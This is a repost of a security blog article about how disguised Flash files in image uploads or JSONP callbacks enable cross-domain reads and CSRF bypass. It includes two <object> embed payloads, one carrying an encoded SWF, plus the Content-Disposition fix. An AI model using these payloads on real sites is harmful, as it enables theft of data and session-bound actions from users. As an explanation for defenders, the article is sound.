These days a lot of websites allow users to upload files, but many don’t know about the unknown pitfalls of letting users (potential attackers) upload files, even valid files.

What’s a valid file? Usually, a restriction would be on two parameters:

The uploaded file extension
The uploaded Content-Type

For example, the web application could check that the extension is “jpg” and the Content-Type “image/jpeg” to make sure it’s impossible to upload malicious files. Right?

The problem is that plugins like Flash doesn’t care about extension and Content-Type. If a file is embedded using an <object> tag, it will be executed as a Flash file as long as the content of the file looks like a valid Flash file.

But wait a minute! Shouldn’t the Flash be executed within the domain that embeds the file using the <object> tag? Yes and no. If a Flash file (bogus image file) is uploaded on victim.com and then embedded at attacker.com, the Flash file can execute JavaScript within the domain of attacker.com. However, if the Flash file sends requests, it will be allowed to read files within the domain of victim.com.

This basically means that if a website allows file uploads without validating the content of the file, an attacker can bypass any CSRF protection on the website.

The attack

Based on these facts we can create an attack scenario like this:

An attacker creates a malicious Flash (SWF) file
The attacker changes the file extension to JPG
The attacker uploads the file to victim.com
The attacker embeds the file on attacker.com using an <object> tag with type “application/x-shockwave-flash”
The victim visits attacker.com, loads the file as embedded with the <object> tag
The attacker can now send and receive arbitrary requests to victim.com using the victims session
The attacker sends a request to victim.com and extracts the CSRF token from the response

A payload could look like this:

 <object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object>

The fix

The good news is that there’s a fairly easy way to prevent Flash from doing this. Flash won’t execute the file if it sends a Content-Disposition header like so:

Content-Disposition: attachment; filename=”image.jpg”
Other uses

But the fun doesn’t stop at file uploads! Since the only requirements of this attack is that an attacker can control the data on a location of the target domain (regardless of Content-Type), there’s more ways to perform this attack.

One way would be to abuse a JSONP API. Usually, the attacker can control the output of a JSONP API endpoint by changing the callback of the current location. There’s no Cross-Site Scripting issue because the server will send Content-Type “application/json”. However, if an attacker uses an entire Flash file as callback and embeds that URL on their domain using the <object> tag, we have the same outcome. A payload could look like this:

<object style="height:1px;width:1px;" data="http://mywebsite.example.com/user/get?type=jsonp&callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://mywebsite.example.com/secret_file.txt"></object>

And like always, if you want to know if your website has issues like these, try a Detectify scan!

That’s it for now

paper referer:https://labs.detectify.com/2014/05/20/the-lesser-known-pitfalls-of-allowing-file-uploads-on-your-website/

The lesser known pitfalls of allowing file uploads on your website的更多相关文章

  1. Asp.net mvc 3 file uploads using the fileapi

    Asp.net mvc 3 file uploads using the fileapi I was recently given the task of adding upload progress ...

  2. [转]File uploads in ASP.NET Core

    本文转自:https://docs.microsoft.com/en-us/aspnet/core/mvc/models/file-uploads By Steve Smith ASP.NET MVC ...

  3. [AngularFire] Angular File Uploads to Firebase Storage with Angular control value accessor

    The upload class will be used in the service layer. Notice it has a constructor for file attribute, ...

  4. Django处理文件上传File Uploads

    HttpRequest.FILES 表单上传的文件对象存储在类字典对象request.FILES中,表单格式需为multipart/form-data <form enctype="m ...

  5. jQuery File Upload 单页面多实例的实现

    jQuery File Upload 的 GitHub 地址:https://github.com/blueimp/jQuery-File-Upload 插件描述:jQuery File Upload ...

  6. 【转发】Html5 File Upload with Progress

    Html5 File Upload with Progress               Posted by Shiv Kumar on 25th September, 2010Senior Sof ...

  7. Resumable uploads over HTTP. Protocol specification

    Valery Kholodkov <valery@grid.net.ru>, 2010 1. Introduction This document describes applicatio ...

  8. Resumable Media Uploads in the Google Data Protocol

    Eric Bidelman, Google Apps APIs team February 2010 Introduction The Resumable Protocol Initiating a ...

  9. ExpressJS File Uploading – GridFS – MongoDB

    n this blog post we will see how to handle multipart data/file uploading with expressjs. Save files ...

随机推荐

  1. myeclipse 10 j安装了JDK1.7,java编译器无法选择到1.7的问题

    java程序编写,在eclipse中会自动编译,编译的版本在preferrence-->java-->compiler选择具体版本,这时你写程序时自动编译用的jdk就是这个版本的jdk,这 ...

  2. 关于CKEDITOR的一些小问题

    <textarea  name="tMessage" ></textarea> <script type="text/javascript& ...

  3. QT QStringListModel 示例代码

    1.  QStringListModel , 实现 插入 删除 编辑 list,支持鼠标双击编辑. 2. dialog.h #ifndef DIALOG_H #define DIALOG_H #inc ...

  4. QT QMimeData类

    http://blog.csdn.net/xie376450483/article/details/5863810 QMimeData类提为数据提供一个容器,用来记录关于MIME类型数据的信息 QMi ...

  5. Codeforces Round #280 (Div. 2) D. Vanya and Computer Game 数学

    D. Vanya and Computer Game time limit per test 2 seconds memory limit per test 256 megabytes input s ...

  6. hdu 5895 Mathematician QSC 指数循环节+矩阵快速幂

    Mathematician QSC Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/131072 K (Java/Othe ...

  7. Java内部锁的可重用性(Reentrancy)

    Java提供了强制原子性的内部锁机制:synchronized块.但是内部锁是可重入的,当线程试图获得它自己占有的锁时,请求会成功. 简单的说,就是在一个synchronized方法内部调用本类的其他 ...

  8. php开发工程师面必问题

    随着培训机构的增加,越来越多的php从业者流入市场,从而影响了php就业环境.公司对人才的要求越来越高,而技术者本身也要技术过硬,学习越来越多的东西,因为只有这样,你才能跑在别人前面,才不被市场抛弃, ...

  9. 如何做好App的测试工作

    记得刚开始接触app测试时,可谓是一脸懵状,拿到一个功能不知道该测些什么,会因为测试范围确认不足.测试点考虑不全等导致线上问题,吃一堑才会长一智,栽过几次坑后就学会了如何避免.现总结App测试点如下, ...

  10. TCP/IP详解学习笔记(1)-基本概念【转】

    转自:http://blog.csdn.net/goodboy1881/article/details/665041 为什么会有TCP/IP协议 在世界上各地,各种各样的电脑运行着各自不同的操作系统为 ...